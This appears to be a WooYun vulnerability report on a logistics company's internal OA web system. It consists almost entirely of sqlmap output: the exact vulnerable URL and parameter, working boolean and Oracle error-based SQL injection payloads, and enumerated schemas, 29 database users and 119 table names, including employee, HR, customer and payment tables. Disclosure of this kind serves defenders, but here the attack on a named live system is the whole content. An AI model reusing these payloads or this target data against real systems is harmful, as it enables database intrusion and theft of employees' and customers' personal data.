WooYun.org

https://sso.zt-express.com/

oa.zt-express.com/OA/InfoCenter/ConsignmentInfo/consignmentselect.aspx?method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b

Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND
9874=9874 AND 'XlcM'='XlcM
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND
2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(1
18)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR
(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='
eGnY
---
[16:44:54] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[16:44:54] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[16:44:54] [INFO] fetching database (schema) names
[16:44:55] [INFO] the SQL query used returns 7 entries
[16:44:55] [INFO] retrieved: CTXSYS
[16:44:56] [INFO] retrieved: EXFSYS
[16:44:56] [INFO] retrieved: MDSYS
[16:44:57] [INFO] retrieved: NEWZTOOA
[16:44:57] [INFO] retrieved: OLAPSYS
[16:44:58] [INFO] retrieved: SYS
[16:44:58] [INFO] retrieved: SYSTEM
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] NEWZTOOA
[*] OLAPSYS
[*] SYS
[*] SYSTEM

Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND
9874=9874 AND 'XlcM'='XlcM
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND
2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(1
18)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR
(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='
eGnY
---
[17:03:44] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[17:03:44] [INFO] fetching database users
[17:03:45] [INFO] the SQL query used returns 29 entries
[17:03:45] [INFO] retrieved: READONLY
[17:03:45] [INFO] retrieved: WEIXIN
[17:03:46] [INFO] retrieved: OGG_SYNC
[17:03:46] [INFO] retrieved: CRM
[17:03:46] [INFO] retrieved: DBMS
[17:03:46] [INFO] retrieved: WULIAO
[17:03:47] [INFO] retrieved: ZHONGCAI
[17:03:47] [INFO] retrieved: NEWZTOOA
[17:03:47] [INFO] retrieved: ZTOWEB
[17:03:48] [INFO] retrieved: MDDATA
[17:03:48] [INFO] retrieved: MDSYS
[17:03:48] [INFO] retrieved: SI_INFORMTN_SCHEMA
[17:03:49] [INFO] retrieved: ORDPLUGINS
[17:03:49] [INFO] retrieved: ORDSYS
[17:03:49] [INFO] retrieved: OLAPSYS
[17:03:50] [INFO] retrieved: WDOA
[17:03:50] [INFO] retrieved: ANONYMOUS
[17:03:50] [INFO] retrieved: XDB
[17:03:50] [INFO] retrieved: CTXSYS
[17:03:51] [INFO] retrieved: EXFSYS
[17:03:51] [INFO] retrieved: WMSYS
[17:03:51] [INFO] retrieved: ORACLE_OCM
[17:03:52] [INFO] retrieved: DBSNMP
[17:03:52] [INFO] retrieved: TSMSYS
[17:03:52] [INFO] retrieved: DMSYS
[17:03:52] [INFO] retrieved: DIP
[17:03:53] [INFO] retrieved: OUTLN
[17:03:53] [INFO] retrieved: SYSTEM
[17:03:53] [INFO] retrieved: SYS
database management system users [29]:
[*] ANONYMOUS
[*] CRM
[*] CTXSYS
[*] DBMS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] NEWZTOOA
[*] OGG_SYNC
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] READONLY
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSTEM
[*] TSMSYS
[*] WDOA
[*] WEIXIN
[*] WMSYS
[*] WULIAO
[*] XDB
[*] ZHONGCAI
[*] ZTOWEB

Payload: method=&SIGN=0&CONSIGNMENTID=d556338ceafb4afb9889b28f0568244b' AND
2870=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(107)||CHR(1
18)||CHR(113)||(SELECT (CASE WHEN (2870=2870) THEN 1 ELSE 0 END) FROM DUAL)||CHR
(113)||CHR(118)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'eGnY'='
eGnY
---
[17:06:46] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[17:06:46] [INFO] fetching tables for database: 'NEWZTOOA'
[17:06:46] [INFO] the SQL query used returns 197 entries
[17:06:47] [INFO] retrieved: TAB_ZTOA_EMPLOYEE
[17:06:47] [INFO] retrieved: TAB_ZTOA_OLDSCANGUN
[17:06:48] [INFO] retrieved: TAB_ZTOA_SQLTOCSV
[17:06:48] [INFO] retrieved: TAB_ZTOA_USERTEL
[17:06:48] [INFO] retrieved: TAB_ZTOA_ZTBEST
[17:06:49] [INFO] retrieved: TAB_ZTWEB_BILLSEARCHLOG
[17:06:49] [INFO] retrieved: TAB_TAOBAO_RATE
[17:06:50] [INFO] retrieved: TAB_ZTOA_COURSEWARE
[17:06:50] [INFO] retrieved: TAB_ZTOA_USERSITEIT
[17:06:50] [INFO] retrieved: TAB_TAOBAO_COMPLAINT
[17:06:51] [INFO] retrieved: TAB_TAOBAO_AREA
[17:06:51] [INFO] retrieved: TAB_ZTOA_DIGLOG
[17:06:51] [INFO] retrieved: TAB_TAOBAO_GS
[17:06:52] [INFO] retrieved: TAB_TAOBAO_SPEED
[17:06:52] [INFO] retrieved: TAB_ZTOA_SITEPROVINCE
[17:06:53] [INFO] retrieved: TAB_CENTER_RATES
[17:06:53] [INFO] retrieved: TAB_ZTOA_PUCHA_BAK
[17:06:53] [INFO] retrieved: DR$CONTENT_IDX$I
[17:06:54] [INFO] retrieved: DR$CONTENT_IDX$R
[17:06:54] [INFO] retrieved: TAB_ZTOA_WORKLOG
[17:06:55] [INFO] retrieved: TAB_GUARD_PIC
[17:06:55] [INFO] retrieved: TAB_A
[17:06:56] [INFO] retrieved: TAB_PROVINCE_TEMP
[17:06:56] [INFO] retrieved: TAB_SITE_MONTHCOUNT
[17:06:56] [INFO] retrieved: TAB_NO_PAYBQ
[17:06:57] [INFO] retrieved: TAB_TEST1
[17:06:57] [INFO] retrieved: TAB_ZTOA_AIRPORTCODE
[17:06:58] [INFO] retrieved: TAB_ZTOA_AMERCE
[17:06:58] [INFO] retrieved: TAB_ZTOA_AMERCETWO
[17:06:58] [INFO] retrieved: TAB_ZTOA_ARBITRATION
[17:06:59] [INFO] retrieved: TAB_ZTOA_ARBITRATIONAPPEAL
[17:06:59] [INFO] retrieved: TAB_ZTOA_ARBITRATIONDISP
[17:07:00] [INFO] retrieved: TAB_ZTOA_ARBITRATIONDISPSITE
[17:07:00] [INFO] retrieved: TAB_ZTOA_ARBITRATIONMAKEKNOWN
[17:07:00] [INFO] retrieved: TAB_ZTOA_ARBITRATIONSITE
[17:07:01] [INFO] retrieved: TAB_ZTOA_ARBITRATIONTYPE
[17:07:01] [INFO] retrieved: TAB_ZTOA_ASSET_APPLY
[17:07:02] [INFO] retrieved: TAB_ZTOA_ASSET_APPLY_TRACK
[17:07:02] [INFO] retrieved: TAB_ZTOA_ASSET_DICTIONARY
[17:07:02] [INFO] retrieved: TAB_ZTOA_ASSET_NOTES
[17:07:03] [INFO] retrieved: TAB_ZTOA_ASSET_VENDOR
[17:07:03] [INFO] retrieved: TAB_ZTOA_BREAKBILL
[17:07:04] [INFO] retrieved: TAB_ZTOA_BUSLINES
[17:07:04] [INFO] retrieved: TAB_ZTOA_BUSNAME
[17:07:04] [INFO] retrieved: TAB_ZTOA_CAHIERDATA
[17:07:05] [INFO] retrieved: TAB_ZTOA_COMMENTON
[17:07:05] [INFO] retrieved: TAB_ZTOA_CONSIGNMENT
[17:07:06] [INFO] retrieved: TAB_ZTOA_CONSIGNMENTINFO
[17:07:06] [INFO] retrieved: TAB_ZTOA_CUSTOMER
[17:07:07] [INFO] retrieved: TAB_ZTOA_DATAINFO
[17:07:07] [INFO] retrieved: TAB_ZTOA_DATASORT
[17:07:07] [INFO] retrieved: TAB_ZTOA_DISPOSEBOOK
[17:07:08] [INFO] retrieved: TAB_ZTOA_DISPOSESITE
[17:07:08] [INFO] retrieved: TAB_ZTOA_FINANCE_LIST
[17:07:09] [INFO] retrieved: TAB_ZTOA_FINANCE_TYPE
[17:07:09] [INFO] retrieved: TAB_ZTOA_FLIGHTS
[17:07:09] [INFO] retrieved: TAB_ZTOA_FUNCTIONMODULE
[17:07:10] [INFO] retrieved: TAB_ZTOA_GUESTBOOK
[17:07:10] [INFO] retrieved: TAB_ZTOA_HRBASICINFO
[17:07:11] [INFO] retrieved: TAB_ZTOA_HRDUTY
[17:07:11] [INFO] retrieved: TAB_ZTOA_HYPOLINER
[17:07:11] [INFO] retrieved: TAB_ZTOA_HYPOLINERDATA
[17:07:12] [INFO] retrieved: TAB_ZTOA_ITEQUIPMENT
[17:07:12] [INFO] retrieved: TAB_ZTOA_ITREGISTER
[17:07:13] [INFO] retrieved: TAB_ZTOA_ITSTORAGE
[17:07:13] [INFO] retrieved: TAB_ZTOA_ITWORK
[17:07:13] [INFO] retrieved: TAB_ZTOA_K8HELP
[17:07:14] [INFO] retrieved: TAB_ZTOA_LEAVEBEHINDDATA
[17:07:14] [INFO] retrieved: TAB_ZTOA_LOGINPAGE
[17:07:15] [INFO] retrieved: TAB_ZTOA_MAINLINER
[17:07:15] [INFO] retrieved: TAB_ZTOA_MAINLINERDATA
[17:07:15] [INFO] retrieved: TAB_ZTOA_MOTIF
[17:07:16] [INFO] retrieved: TAB_ZTOA_MOTIFCHILD
[17:07:16] [INFO] retrieved: TAB_ZTOA_NEWSDEPARTMENT
[17:07:17] [INFO] retrieved: TAB_ZTOA_NEWSSORT
[17:07:17] [INFO] retrieved: TAB_ZTOA_NOBILL
[17:07:17] [INFO] retrieved: TAB_ZTOA_ONDUTY
[17:07:18] [INFO] retrieved: TAB_ZTOA_PAISONGFEI
[17:07:18] [INFO] retrieved: TAB_ZTOA_PINGIP
[17:07:18] [INFO] retrieved: TAB_ZTOA_PINGLIST
[17:07:19] [INFO] retrieved: TAB_ZTOA_POSTCODE
[17:07:19] [INFO] retrieved: TAB_ZTOA_POST_REPORT
[17:07:20] [INFO] retrieved: TAB_ZTOA_PROVINCELINER
[17:07:20] [INFO] retrieved: TAB_ZTOA_PROVINCELINERDATA
[17:07:20] [INFO] retrieved: TAB_ZTOA_RELATINGPOSTCODE
[17:07:21] [INFO] retrieved: TAB_ZTOA_REOPRTSITE
[17:07:21] [INFO] retrieved: TAB_ZTOA_REPORTCHILD
[17:07:22] [INFO] retrieved: TAB_ZTOA_ROLEFUNCTION
[17:07:22] [INFO] retrieved: TAB_ZTOA_ROLES
[17:07:22] [INFO] retrieved: TAB_ZTOA_SITEBOOK
[17:07:23] [INFO] retrieved: TAB_ZTOA_SITEBOOKBACK
[17:07:23] [INFO] retrieved: TAB_ZTOA_SITEMAP
[17:07:24] [INFO] retrieved: TAB_ZTOA_SITEVISUALIZE
[17:07:24] [INFO] retrieved: TAB_ZTOA_SUFFRAGE
[17:07:25] [INFO] retrieved: TAB_ZTOA_TASK
[17:07:25] [INFO] retrieved: TAB_ZTOA_TASK_ADDED
[17:07:25] [INFO] retrieved: TAB_ZTOA_TASK_FILE
[17:07:26] [INFO] retrieved: TAB_ZTOA_TRANSFERFEE
[17:07:26] [INFO] retrieved: TAB_ZTOA_USERPHONE
[17:07:26] [INFO] retrieved: TAB_ZTOA_USERVALIDATE
[17:07:27] [INFO] retrieved: TAB_ZTOA_WEBLOG
[17:07:28] [INFO] retrieved: TAB_ZTOA_ZHIFUBAO
[17:07:28] [INFO] retrieved: TAB_ZTOOA_IPMANAGE
[17:07:28] [INFO] retrieved: TAB_ZTWEB_CITY
[17:07:29] [INFO] retrieved: TAB_ZTWEB_EXAMINEE
[17:07:29] [INFO] retrieved: TAB_ZTWEB_JOB
[17:07:30] [INFO] retrieved: TAB_ZTWEB_PROVINCE
[17:07:30] [INFO] retrieved: TAB_ZTWEB_SITE2
[17:07:30] [INFO] retrieved: TAB_ZTWEB_SLIDE
[17:07:31] [INFO] retrieved: TAB_ADDRESS_DISTRICT
[17:07:31] [INFO] retrieved: TAB_ADDRESS_ZIPCODE
[17:07:32] [INFO] retrieved: TAB_ZTOA_PUCHA
[17:07:32] [INFO] retrieved: TAB_ZTOA_ARBITRATIONSORT
[17:07:32] [INFO] retrieved: TAB_ZTOA_YZTJYB
[17:07:33] [INFO] retrieved: TAB_ZTOA_YIYUN1
[17:07:33] [INFO] retrieved: TAB_ZTOA_YIYUN2
[17:07:34] [INFO] retrieved: AA
[17:07:34] [INFO] retrieved: TAB_ZTOA_SUPERVISE
[17:07:34] [INFO] retrieved: TAB_ZTOA_TASK_USER
sqlmap got a 302 redirect to 'http://oa.zt-express.com:80/Login.aspx'. Do you wa
nt to follow? [Y/n] n
Database: NEWZTOOA
[119 tables]
+-------------------------------+
| AA                            |
| DR$CONTENT_IDX$I              |
| DR$CONTENT_IDX$R              |
| TAB_A                         |
| TAB_ADDRESS_DISTRICT          |
| TAB_ADDRESS_ZIPCODE           |
| TAB_CENTER_RATES              |
| TAB_GUARD_PIC                 |
| TAB_NO_PAYBQ                  |
| TAB_PROVINCE_TEMP             |
| TAB_SITE_MONTHCOUNT           |
| TAB_TAOBAO_AREA               |
| TAB_TAOBAO_COMPLAINT          |
| TAB_TAOBAO_GS                 |
| TAB_TAOBAO_RATE               |
| TAB_TAOBAO_SPEED              |
| TAB_TEST1                     |
| TAB_ZTOA_AIRPORTCODE          |
| TAB_ZTOA_AMERCE               |
| TAB_ZTOA_AMERCETWO            |
| TAB_ZTOA_ARBITRATION          |
| TAB_ZTOA_ARBITRATIONAPPEAL    |
| TAB_ZTOA_ARBITRATIONDISP      |
| TAB_ZTOA_ARBITRATIONDISPSITE  |
| TAB_ZTOA_ARBITRATIONMAKEKNOWN |
| TAB_ZTOA_ARBITRATIONSITE      |
| TAB_ZTOA_ARBITRATIONSORT      |
| TAB_ZTOA_ARBITRATIONTYPE      |
| TAB_ZTOA_ASSET_APPLY          |
| TAB_ZTOA_ASSET_APPLY_TRACK    |
| TAB_ZTOA_ASSET_DICTIONARY     |
| TAB_ZTOA_ASSET_NOTES          |
| TAB_ZTOA_ASSET_VENDOR         |
| TAB_ZTOA_BREAKBILL            |
| TAB_ZTOA_BUSLINES             |
| TAB_ZTOA_BUSNAME              |
| TAB_ZTOA_CAHIERDATA           |
| TAB_ZTOA_COMMENTON            |
| TAB_ZTOA_CONSIGNMENT          |
| TAB_ZTOA_CONSIGNMENTINFO      |
| TAB_ZTOA_COURSEWARE           |
| TAB_ZTOA_CUSTOMER             |
| TAB_ZTOA_DATAINFO             |
| TAB_ZTOA_DATASORT             |
| TAB_ZTOA_DIGLOG               |
| TAB_ZTOA_DISPOSEBOOK          |
| TAB_ZTOA_DISPOSESITE          |
| TAB_ZTOA_EMPLOYEE             |
| TAB_ZTOA_FINANCE_LIST         |
| TAB_ZTOA_FINANCE_TYPE         |
| TAB_ZTOA_FLIGHTS              |
| TAB_ZTOA_FUNCTIONMODULE       |
| TAB_ZTOA_GUESTBOOK            |
| TAB_ZTOA_HRBASICINFO          |
| TAB_ZTOA_HRDUTY               |
| TAB_ZTOA_HYPOLINER            |
| TAB_ZTOA_HYPOLINERDATA        |
| TAB_ZTOA_ITEQUIPMENT          |
| TAB_ZTOA_ITREGISTER           |
| TAB_ZTOA_ITSTORAGE            |
| TAB_ZTOA_ITWORK               |
| TAB_ZTOA_K8HELP               |
| TAB_ZTOA_LEAVEBEHINDDATA      |
| TAB_ZTOA_LOGINPAGE            |
| TAB_ZTOA_MAINLINER            |
| TAB_ZTOA_MAINLINERDATA        |
| TAB_ZTOA_MOTIF                |
| TAB_ZTOA_MOTIFCHILD           |
| TAB_ZTOA_NEWSDEPARTMENT       |
| TAB_ZTOA_NEWSSORT             |
| TAB_ZTOA_NOBILL               |
| TAB_ZTOA_OLDSCANGUN           |
| TAB_ZTOA_ONDUTY               |
| TAB_ZTOA_PAISONGFEI           |
| TAB_ZTOA_PINGIP               |
| TAB_ZTOA_PINGLIST             |
| TAB_ZTOA_POSTCODE             |
| TAB_ZTOA_POST_REPORT          |
| TAB_ZTOA_PROVINCELINER        |
| TAB_ZTOA_PROVINCELINERDATA    |
| TAB_ZTOA_PUCHA                |
| TAB_ZTOA_PUCHA_BAK            |
| TAB_ZTOA_RELATINGPOSTCODE     |
| TAB_ZTOA_REOPRTSITE           |
| TAB_ZTOA_REPORTCHILD          |
| TAB_ZTOA_ROLEFUNCTION         |
| TAB_ZTOA_ROLES                |
| TAB_ZTOA_SITEBOOK             |
| TAB_ZTOA_SITEBOOKBACK         |
| TAB_ZTOA_SITEMAP              |
| TAB_ZTOA_SITEPROVINCE         |
| TAB_ZTOA_SITEVISUALIZE        |
| TAB_ZTOA_SQLTOCSV             |
| TAB_ZTOA_SUFFRAGE             |
| TAB_ZTOA_SUPERVISE            |
| TAB_ZTOA_TASK                 |
| TAB_ZTOA_TASK_ADDED           |
| TAB_ZTOA_TASK_FILE            |
| TAB_ZTOA_TASK_USER            |
| TAB_ZTOA_TRANSFERFEE          |
| TAB_ZTOA_USERPHONE            |
| TAB_ZTOA_USERSITEIT           |
| TAB_ZTOA_USERTEL              |
| TAB_ZTOA_USERVALIDATE         |
| TAB_ZTOA_WEBLOG               |
| TAB_ZTOA_WORKLOG              |
| TAB_ZTOA_YIYUN1               |
| TAB_ZTOA_YIYUN2               |
| TAB_ZTOA_YZTJYB               |
| TAB_ZTOA_ZHIFUBAO             |
| TAB_ZTOA_ZTBEST               |
| TAB_ZTOOA_IPMANAGE            |
| TAB_ZTWEB_BILLSEARCHLOG       |
| TAB_ZTWEB_CITY                |
| TAB_ZTWEB_EXAMINEE            |
| TAB_ZTWEB_JOB                 |
| TAB_ZTWEB_PROVINCE            |
| TAB_ZTWEB_SITE2               |
| TAB_ZTWEB_SLIDE               |
+-------------------------------+